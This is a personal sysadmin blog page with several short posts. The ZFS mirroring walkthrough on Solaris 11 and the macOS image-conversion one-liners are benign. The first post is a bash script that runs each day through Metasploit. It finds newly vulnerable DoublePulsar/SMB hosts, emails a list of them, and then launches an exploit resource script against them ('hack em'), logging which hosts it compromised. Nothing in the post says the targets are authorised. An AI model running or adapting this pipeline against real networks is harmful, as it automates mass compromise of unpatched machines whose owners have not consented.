Wednesday, September 26, 2018

automate exploiting newly-found doublepulsar vulnerable hosts

i've written about how to automate discovery. let's go to the next level and automate reporting on and exploiting newly-discovered doublepulsar vulnerable hosts.

this would assume you have a previously created list of vulnerable host which
we're diffing off-of.
 #!/bin/bash  
 PROCESS=/root/doublepulsar.scan/exploit  
 TODAY=$(date '+%Y%m%d')  
 YESTERDAY=$(date -d "yesterday" '+%Y%m%d')  
   
 cd $PROCESS/  
   
 #dump vulns  
 msfconsole -x "color false ; vulns -o $PROCESS/vulndetect.$TODAY ; exit"  
 grep -o '[0-9]\{1,3\}\.[0-9]\{1,3\}\.[0-9]\{1,3\}\.[0-9]\{1,3\}' $PROCESS/vulndetect.$TODAY \
> $PROCESS/vulnparsed.$TODAY  
 diff -u $PROCESS/vuln.$YESTERDAY $PROCESS/vulnparsed.$TODAY | grep + | grep + |grep -v @ \
|grep -v +++ |sed 's/+//g' > $PROCESS/vuln.$TODAY  
 msfconsole -x "color false ; spool $PROCESS/output.$TODAY ; use auxiliary/scanner/smb/smb_version;  
 set RHOSTS file:$PROCESS/vuln.$TODAY ; set thread 100; run; exit"  
 echo $DATE > $PROCESS/mail.$TODAY  
 cat $PROCESS/vuln.$TODAY $PROCESS/output.$TODAY >> $PROCESS/mail.$TODAY  
 mail -s "new doublepulsar vuln hosts $TODAY " me@in.hell < $PROCESS/mail.$TODAY  
 rm $PROCESS/vulnparsed.*  
 rm $PROCESS/vulndetect.*  
 rm $PROCESS/mail.$TODAY  
   
 cp $PROCESS/vuln.$TODAY /root/.msf4/thewicked  
   
 #hack em  
 kill -9 `ps -ef|grep msfconsole| awk '{print $2}'`  
 msfconsole -r "/root/.msf4/doublepulsar-loop.rc ; exit"  
 ls /root/.msf4/logs/sessions | grep $TODAY \
|grep -o '[0-9]\{1,3\}\.[0-9]\{1,3\}\.[0-9]\{1,3\}\.[0-9]\{1,3\}' > $PROCESS/exploited.$TODAY  
 mail -s "new doublepulsar vuln hosts exploited $TODAY " me@in.hell < $PROCESS/exploited.$TODAY  
 rm $PROCESS/exploited.$TODAY  
   
 exit
Posted by at No comments:

Monday, September 24, 2018

no raid-1? try zfs-mirror in sol11. but wait...

i installed solaris 11.14 on a decade-old system. i was really happy it installed. and then i remembered: i was not given the option to mirror anything. it just installed and i clicked f2 f2 f2. i want to set up something like raid-1. this is solaris, so i can do zfs mirroring. good enough. oh, i did an install over an old system, so yeah, there's that. what i ended up doing was grabbing the partition table from the first (zfs-pool holding) disk and over-wrote that of the second disk since my re-label command was ignored. after that, i created my mirror pool and all was well with the world. 

   
   
 zpool status rpool  
  pool: rpool  
  state: ONLINE  
  scan: none requested  
 config:  
   
     NAME            STATE   READ WRITE CKSUM  
     rpool           ONLINE    0   0   0  
      c0t5000CCA022532534d0s0 ONLINE    0   0   0  
   
 errors: No known data errors  
   
   
 only disk in rpool: c0t5000CCA022532534d0s0  
   
 [root@blackhole ~]# format  
 Searching for disks...done  
   
   
 AVAILABLE DISK SELECTIONS:  
     0. c0t5000CCA022532534d0 <HITACHI-H109030SESUN300G-A31A-279.40GB> solaris  
      /scsi_vhci/disk@g5000cca022532534  
      /dev/chassis/SYS/HDD0/disk  
     1. c0t5000CCA022543154d0 <HITACHI-H109030SESUN300G-A31A-279.40GB> solaris  
      /scsi_vhci/disk@g5000cca022543154  
      /dev/chassis/SYS/HDD1/disk  
   
 1 is the second disk  
   
 1. verify it has Part 0 . It does!  
   
 [root@blackhole ~]# zpool attach rpool c0t5000CCA022532534d0s0 c0t5000CCA022543154d0s0  
 vdev verification failed: use -f to override the following errors:  
 /dev/dsk/c0t5000CCA022543154d0s0 contains a ufs filesystem.  
 Unable to build pool from specified devices: device already in use  
   
   
 Nope.  
   
 format -e   
 <select 1>  
 format > p [Parition editor]  
 format > label  
 Specify Label type[0]: 0  
 Ready to label disk, continue? y  
   
 root@blackhole:~# zpool attach rpool c0t5000CCA022532534d0s0 c0t5000CCA022543154d0s0  
 cannot attach c0t5000CCA022543154d0s0 to c0t5000CCA022532534d0s0: device is too small  
   
 Still nope.  
   
 root@blackhole:~# prtvtoc /dev/dsk/c0t5000CCA022532534d0s0  
 * /dev/dsk/c0t5000CCA022532534d0s0 (volume "solaris") partition map  
 *  
 * Dimensions:  
 *   512 bytes/sector  
 *   625 sectors/track  
 *   20 tracks/cylinder  
 *  12500 sectors/cylinder  
 *  46875 cylinders  
 *  46873 accessible cylinders  
 *  
 * Flags:  
 *  1: unmountable  
 * 10: read-only  
 *  
 *             First   Sector  Last  
 * Partition Tag Flags  Sector   Count  Sector Mount Directory  
     0   2  00     0 585912500 585912499  
     2   5  01     0 585912500 585912499  
   
 okay.  
   
 root@blackhole:~# prtvtoc /dev/dsk/c0t5000CCA022543154d0s0  
 * /dev/dsk/c0t5000CCA022543154d0s0 (volume "solaris") partition map  
 *  
 * Dimensions:  
 *   512 bytes/sector  
 *   625 sectors/track  
 *   20 tracks/cylinder  
 *  12500 sectors/cylinder  
 *  46875 cylinders  
 *  46873 accessible cylinders  
 *  
 * Flags:  
 *  1: unmountable  
 * 10: read-only  
 *  
 *             First   Sector  Last  
 * Partition Tag Flags  Sector   Count  Sector Mount Directory  
     0   2  00     0  262500  262499  
     1   3  01   262500  262500  524999  
     2   5  01     0 585912500 585912499  
     6   4  00   525000 585387500 585912499  
   
 NOT okay.  
  
 root@blackhole:~# prtvtoc /dev/dsk/c0t5000CCA022532534d0s0 > /tmp/dsk0-part.dump
   
 root@blackhole:~# fmthard -s /tmp/dsk0-part.dump /dev/rdsk/c0t5000CCA022543154d0s0  
 fmthard: New volume table of contents now in place.  
   
   
 Verify the VTOC on c0t5000CCA022543154d0s0. We're going to do something wicked.  
   
 root@blackhole:~# prtvtoc /dev/dsk/c0t5000CCA022543154d0s0  
 * /dev/dsk/c0t5000CCA022543154d0s0 (volume "solaris") partition map  
 *  
 * Dimensions:  
 *   512 bytes/sector  
 *   625 sectors/track  
 *   20 tracks/cylinder  
 *  12500 sectors/cylinder  
 *  46875 cylinders  
 *  46873 accessible cylinders  
 *  
 * Flags:  
 *  1: unmountable  
 * 10: read-only  
 *  
 *             First   Sector  Last  
 * Partition Tag Flags  Sector   Count  Sector Mount Directory  
     0   2  00     0 585912500 585912499  
     2   5  01     0 585912500 585912499  
   
 This is okay.  
   
 root@blackhole:~# zpool attach rpool c0t5000CCA022532534d0s0 c0t5000CCA022543154d0s0  
 Make sure to wait until resilver is done before rebooting.  
   
 This is much better.  
   
 root@blackhole:~# zpool status rpool  
  pool: rpool  
  state: ONLINE  
  scan: resilvered 21.9G in 2m52s with 0 errors on Mon Sep 24 15:39:51 2018  
   
 config:  
   
     NAME             STATE   READ WRITE CKSUM  
     rpool            ONLINE    0   0   0  
      mirror-0          ONLINE    0   0   0  
       c0t5000CCA022532534d0s0 ONLINE    0   0   0  
       c0t5000CCA022543154d0s0 ONLINE    0   0   0  
   
 errors: No known data errors  
   
 This is much much better.  
   
 root@blackhole:~# zpool list rpool  
 NAME  SIZE ALLOC FREE CAP DEDUP HEALTH ALTROOT  
 rpool 278G 38.2G 240G 13% 1.00x ONLINE -  
   
 We are golden!
Posted by at No comments:

Saturday, September 22, 2018

macos split all the jpgs in a directory in half 

find . -name "*.jpg" | while read $i; do convert $i -crop 50%x100% +repage $i; done

a play on: 
convert input.png -crop 50%x100% +repage input.png
Posted by at No comments:

Monday, September 17, 2018

macos terminal convert pdf to jpg 

find . -name "*.pdf" | while read filename; do fileconvert=`echo "$filename" \
| sed "s/pdf/jpg/g"` ; sips -s format jpeg "$filename" --out "$fileconvert";  done
Posted by at No comments:
Subscribe to: Posts (Atom)